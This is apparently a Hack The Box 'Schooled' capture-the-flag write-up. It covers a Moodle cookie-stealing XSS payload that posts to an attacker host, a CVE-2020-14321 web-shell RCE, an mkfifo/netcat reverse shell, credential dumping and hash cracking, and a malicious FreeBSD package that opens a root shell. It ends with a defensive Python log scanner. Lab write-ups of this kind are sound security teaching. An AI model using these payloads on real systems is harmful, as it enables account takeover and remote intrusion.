Schooled HTB

nmap scan:

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD)
Service Info: OS: FreeBSD;

Port 80 serves a web service, which says that all content will be delivered over Moodle.

Enumerating its subdomains with gobuster:

gobuster dns -d erev0s.com -w su 0 -i

Let's get it :)
So let's enumerate more...

Once we enrol in the courses, we can see some instructions.

MoodleNet profiles need to be set, hmm...
Let's check some known exploits for Moodle.

Ah, there is an XSS issue, let's check that out.

Stored XSS works as intended.

Since the maths teacher said he will be checking the profile IDs, we can use stored XSS to steal his cookie and log in as that teacher.
XSS payload:

<img src='x' onerror='fetch("http://[IP]/?data=" + btoa(document.cookie));'>

On the attacker machine, a simple HTTP server catches the callback carrying the base64-encoded cookie:

sudo python3 -m http.server <port>

Replacing my cookie with the teacher's cookie, we can take over the teacher's account.

Hmm... there is an RCE vulnerability:

CVE-2020-14321

Using this vulnerability we get RCE; to turn it into a shell we will be using webwrap:

python3 webwrap.py http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=WRAP

and netcat to get a proper, stable shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

Enumerating, we can see that there are two users.

We don't have access to them yet. Enumerating further, we can see that Moodle uses MySQL, so finding Moodle's config.php reveals the MySQL username and password.
config.php is located under:

/usr/local/www/apache24/data/moodle

The mysql client is located in /usr/local/bin:

./mysql -u moodle -pPlaybookMaster2020 -D moodle -e 'SELECT username, password FROM mdl_user ORDER BY username;'

This gives the admin username and password hash. The hash is bcrypt, so crack it with hashcat (mode 3200):

hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt

Logging in as admin, we can see that

he is one of the two users we found on the box, so we SSH in as this user.

Enumerating, we can see that this user has sudo permission for package installation (pkg install), so we build a package whose install scripts will run as root:

#!/bin/bash
# Builds a FreeBSD package whose +PRE_INSTALL / +POST_INSTALL scripts run as root
# when the package is installed with the sudo-permitted pkg install.
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/a
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
# Package the staging directory into mypackage-1.0_5.txz in the current directory
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .

mkdir /temp/package

Installing this package with sudo pkg install runs the +PRE_INSTALL script as root and gives us the superuser shell.
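From the defender's side, the three noisiest artefacts of this chain (the cookie-exfil callback, the ?cmd= web-shell requests and the mkfifo/nc shell) are easy to pick out of logs. The following is an added example, not part of the original writeup: a small Python scanner run over constructed log lines; the MoodleSession cookie name, the log formats and the sample values are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines modelled on this writeup's chain (not real captures): two
# Apache access-log entries, one egress-proxy entry for a teacher's browser, one audit record.
_EXFIL = base64.b64encode(b"MoodleSession=abc123").decode()  # made-up cookie value
SAMPLE_LINES = [
    '10.10.14.7 - - [01/Jan/2021:12:00:00 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=id HTTP/1.1" 200 53',
    '10.10.14.7 - - [01/Jan/2021:12:00:01 +0000] "GET /moodle/course/view.php?id=5 HTTP/1.1" 200 8120',
    f"proxy 10.0.0.23 GET http://10.10.14.7/?data={_EXFIL} 200",
    'audit uid=80 cmdline="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/f"',
]

REQUEST_RE = re.compile(r"(?:GET|POST)\s+(\S+)")
# mkfifo-backed interactive shell piped into netcat (the one-liner used twice above)
REVSHELL_RE = re.compile(r"mkfifo\s+\S+.*\|\s*(?:/bin/)?(?:ba)?sh\s+-i.*\|\s*nc\b")
SESSION_COOKIE = "MoodleSession"  # Moodle's default session cookie name, assumed unchanged

def classify(line):
    """Return the finding labels for one log line (empty list if benign)."""
    findings = []
    if REVSHELL_RE.search(line):
        findings.append("reverse-shell-cmdline")
    m = REQUEST_RE.search(line)
    if m:
        url = urlparse(m.group(1))
        params = parse_qs(url.query)
        # Moodle block PHP files take no 'cmd' parameter; one here means a dropped web shell.
        if url.path.endswith(".php") and "/blocks/" in url.path and "cmd" in params:
            findings.append("webshell-cmd-param")
        # A base64 'data' parameter that decodes to a session cookie is the XSS callback.
        for value in params.get("data", []):
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
            except (ValueError, binascii.Error):
                continue
            if SESSION_COOKIE + "=" in decoded:
                findings.append("session-cookie-exfil")
    return findings

def scan(lines):
    """Map each line's index to its findings, omitting benign lines."""
    return {i: f for i, l in enumerate(lines) if (f := classify(l))}

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LINES).items():
        print(idx, labels)
```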

Dev Dominus | Cyber security | Developer

AGS